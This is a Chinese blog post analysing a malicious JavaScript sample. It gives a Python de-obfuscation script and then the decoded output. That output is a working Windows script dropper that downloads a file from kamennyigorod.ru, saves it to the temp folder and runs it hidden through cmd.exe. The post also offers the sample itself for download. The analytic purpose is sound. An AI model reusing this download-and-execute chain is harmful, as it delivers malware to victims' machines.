本篇是对JS样本做的简单分析第二篇,样本是上次改成设桌面背景的样本(卡饭精睿包2016.12.16.24,可自行下载),原因是这次又需要分析js的,暂时还没拿到样本,就用之前的练手.
0x1 py脚本
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
' a test module ahoo'
__author__ = 'ahoo'
import codecs
import io
import os
import re
import shutil
import subprocess
import sys
PutPath = '24.vir'  # JS sample to analyse (Kafan sample pack 2016.12.16.24).
OutPath = '24_analysis.txt'  # file the de-obfuscated lines are written to.
myJslog = []  # NOTE(review): looks unused; JSVirus_Parse() builds its own local list.
AuthorSign = True  # module-level flag: WriteResultFile() writes its banner only while this is True.
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')  # force UTF-8 on stdout regardless of console code page
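def ReadLogFile(InPath, ReadTye='r'):
    """Read a UTF-8 text file into a list of lines (line endings kept).

    Args:
        InPath: path of the file to read.
        ReadTye: mode handed to ``codecs.open`` (default ``'r'``).

    Returns:
        One list entry per line, each still carrying its own line ending,
        or an empty list when *InPath* does not exist.
    """
    if not os.path.exists(InPath):
        return []
    # codecs.open keeps the raw line endings (a "\r\n" stays "\r\n");
    # the context manager closes the handle even if decoding fails
    # part-way, which the original open()/close() pair did not guarantee.
    # Iterating the reader never yields None, so no per-line check is needed.
    with codecs.open(InPath, ReadTye, 'utf-8') as f:
        return list(f)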
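def WriteResultFile(OutRePath, findRe=None, WriteTye='a+'):
    """Append analysis lines to *OutRePath* (UTF-8), preceded once by a banner.

    Args:
        OutRePath: path of the result file.
        findRe: lines to write; each gets a trailing ``'\\n'``. ``None``
            (or an empty list) writes only the banner, if it is still due.
        WriteTye: mode handed to ``codecs.open``; the default appends.

    Returns:
        True.
    """
    # The banner must appear only once per run, so the module-level flag is
    # flipped here on first use.
    global AuthorSign
    # None instead of a mutable default list (the list is only read, but the
    # shared-default idiom is a well-known trap for later edits).
    lines = [] if findRe is None else findRe
    with codecs.open(OutRePath, WriteTye, 'utf-8') as f:
        if AuthorSign:
            f.write('\n*****************************************************\r\n')
            f.write('* ahoo JsVirusAnalysis ')
            f.write('\n***************************************************\r\n\n')
            AuthorSign = False
        for i in lines:
            f.write(i + '\n')
    return True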
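# Fragment of the form ['e', ebylx, 'u', 'f'][1]: an array literal without
# nested brackets, immediately indexed by a single digit.
_ARRAY_PICK_RE = re.compile(r'\[([^\[\]]+)\]\[(\d)\]')
# var xnisd = "open";  -> (name, quoted value); a trailing ';' is tolerated.
_STRING_VAR_RE = re.compile(r'var\s+([A-Za-z0-9_]+)\s*=\s*(".+")\s*;?\s*$')
# "abc" + "def" -> "abcdef": drop the quote/plus/quote between two string
# literals. Only whitespace may surround the '+', so a '+' inside a real
# string literal is left alone.
_STRING_JOIN_RE = re.compile(r'"\s*\+\s*"')


def _pick_array_element(match):
    """Resolve one ['a', b, 'c'][n] fragment to its n-th element (as text).

    The fragment is returned unchanged when the index is out of range, so a
    malformed line is passed through instead of aborting the whole run.
    Elements are split on ',' only; a comma inside a quoted element would
    mis-split, as in the original script.
    """
    elements = [e.strip() for e in match.group(1).split(',')]
    index = int(match.group(2))
    if index >= len(elements):
        return match.group(0)
    return elements[index]


def _rewrite_line(line, var_values):
    """Apply the three de-obfuscation passes to one code line and return it.

    Args:
        line: a line of the sample that is not a 'var x = "..."' definition.
        var_values: mapping variable name -> quoted string value.
    """
    # 3.1 ['e', ebylx, 'u', 'f'][1] -> ebylx. A function replacement is used
    # so that backslashes in the chosen element (e.g. 'C:\\') are inserted
    # literally instead of being read as re.sub escape sequences.
    line = _ARRAY_PICK_RE.sub(_pick_array_element, line)
    # 3.2 ebylx -> "va". Whole identifiers only: without \b a short name
    # would also be replaced inside longer identifiers and inside strings.
    for name, value in var_values.items():
        if name in line:
            pattern = re.compile(r'\b' + re.escape(name) + r'\b')
            line = pattern.sub(lambda _m, v=value: v, line)
    # 3.3 "abc" + "def" -> "abcdef"
    return _STRING_JOIN_RE.sub('', line)


def JSVirus_Parse(in_path=None, out_path=None, *, open_editor=True):
    """De-obfuscate the JS sample at *in_path* and write the result.

    The sample is only rewritten textually (array picks resolved, string
    variables inlined, adjacent string literals joined); nothing from it is
    evaluated or executed.

    Args:
        in_path: input file; defaults to the module-level ``PutPath``.
        out_path: result file; defaults to the module-level ``OutPath``.
        open_editor: when True (the default) open the result in notepad.exe
            after writing, as the original script did.

    Returns:
        False when more than three command-line arguments are present,
        True otherwise.
    """
    # 0. argument-count guard (the arguments themselves are not used yet).
    if len(sys.argv) > 3:
        print('Too many argv')  # TODO: switch to proper logging/debug output
        return False
    if in_path is None:
        in_path = PutPath
    if out_path is None:
        out_path = OutPath
    # 1. read the sample into a list of lines.
    js_lines = ReadLogFile(in_path)
    # 2. separate 'var x = "..."' definitions (value table) from code lines.
    var_values = {}
    code_lines = []
    for line in js_lines:
        if 'var' in line and '= "' in line:
            m = _STRING_VAR_RE.match(line)
            if m is not None:
                var_values[m.group(1)] = m.group(2)
            # A 'var ... = "' line that does not fit the pattern is dropped,
            # as in the original script.
        else:
            code_lines.append(line)
    # 3. resolve array picks, inline values, join string literals.
    result = [_rewrite_line(line, var_values) for line in code_lines]
    # 4. write the result and (optionally) show it.
    WriteResultFile(out_path, result)
    if open_editor:
        # Argument list rather than a shell string: out_path is now caller
        # supplied, so it must never be interpolated into a command line.
        try:
            subprocess.call(['notepad.exe', out_path])
        except OSError:
            # No notepad.exe on this host (e.g. non-Windows); the result file
            # is already written, so this is not an error for the analysis.
            print('Could not open notepad.exe; result written to ' + out_path)
    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True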
if __name__ == '__main__':
    # Script entry point: input and output paths come from the module
    # constants PutPath / OutPath defined above.
    JSVirus_Parse()
'''
--测试过程
---line = [gosax, 'b'][0]
print(re.match('\[.*\]',line)) 匹配到 [gosax, 'b'][0] 贪婪
print(re.match('\[(.*)\]\[(.*)\]',line).group(0))
print(re.match('\[(.*)\]\[(.*)\]',line).group(1))
print(re.match('\[(.*)\]\[(.*)\]',line).group(2))
re.match('\[(.*)\]\[(.*)\]',line).group(1).split(',')[0]
---(完成上面单个匹配到的替换) line = [gosax, 'b'][0] or ['e', ebylx, 'u', 'f'][1]
index = int(re.match('\[(.*)\]\[(.*)\]',line).group(2))
replaceTemp = re.compile('\[(.*)\]\[(.*)\]')
repstr = re.match('\[(.*)\]\[(.*)\]',line).group(1).split(',')[index]
line = replaceTemp.sub(repstr,line)
---line = "[gosax, 'b'][0] + ['e', ebylx, 'u', 'f'][1]"
re.match('\[(.*)\]?\[(\d)\]',line).groups()
re.match('\[(.*)\]?',line).group()
re.match('(\[[^\]]+\]\[\d\])',line).group()
---line = "[[gosax, 'b'][0] + ['e', ebylx, 'u', 'f'][1]]"
---line12 = "fxejoplod6 = woqvybd3[[yxypehn, 'gh', 'pk', 'o'][0] + ['rg', 'q', cjupryhfi][2]]([bnifpynmu, 'mj', 'e'][0], [ovfowqi, 'm', 'w'][0] , ['k', lwiju][1]);"
for Line12_split in re.findall('(\[[^\[\]]+\]\[\d\])',line12):
index = int(re.match('\[(.*)\]\[(.*)\]',Line12_split).group(2))
repstr = re.match('\[(.*)\]\[(.*)\]',Line12_split).group(1).split(',')[index]
replaceTemp = re.compile('(\[[^\[\]]+\]\[\d\])')
line12 = replaceTemp.sub(repstr,line12,count=1)
print(line12)
'''
0x2 输出结果
*****************************************************
*Name: ahoo JsVirusAnalysis
*****************************************************
var ybdetof5 = new ActiveXObject('Scripting.FileSystemObject');
if (['dm', 'o', new Function( "var inkezs3 = new Enumerator(ybdetof5.GetFolder('C:\\').SubFolders); if(inkezs3.item(0).name.length > 1) return true; else return false;")()][2]) {
hneneqil0 = this[ "WScript"];
istudyd7 = hneneqil0[ "CreateObject"]( "Scripting.FileSystemObject");
lysfopdep3 = hneneqil0[ "CreateObject"]( "WScript.Shel);
woqvybd3 = hneneqil0[ "CreateObject"]( "MSXML2.XMLHTTP");
jucyzmum2 = hneneqil0[ "CreateObject"]( "ADODB.Stream");
ihyxu0 = istudyd7[ "GetSpecialFolder"]( "2");
ubujile0 = istudyd7[ "GetTempName"]();
fxejoplod6 = woqvybd3["open"]("GET", "http://kamennyigorod.ru/form.uio", "0");
fxejoplod6 = woqvybd3[ "send"]();
jucyzmum2[ "type"] = "1";
avolcuc7 = woqvybd3["ResponseBody"];
hnoqasann0 = hneneqil0[ "ScriptFullName"];
fxejoplod6 = jucyzmum2[ "Open"]();
fxejoplod6 = jucyzmum2["Write"](avolcuc7);
fxejoplod6 = jucyzmum2[ "SaveToFile"](ihyxu0 + ubujile0);
fxejoplod6 = jucyzmum2["Close"]();
fxejoplod6 = lysfopdep3[ "run"]( "cmd.exe /c + ihyxu0 + ubujile0, "0");
}10
0x3 Sample
Sample- 注:请确认样本只用于测试才下载,其他的我可不负责…
密码国际惯例
0x4 参考文章
[1]pythonDocument : 6.2. re — Regular expression operations
[4]blog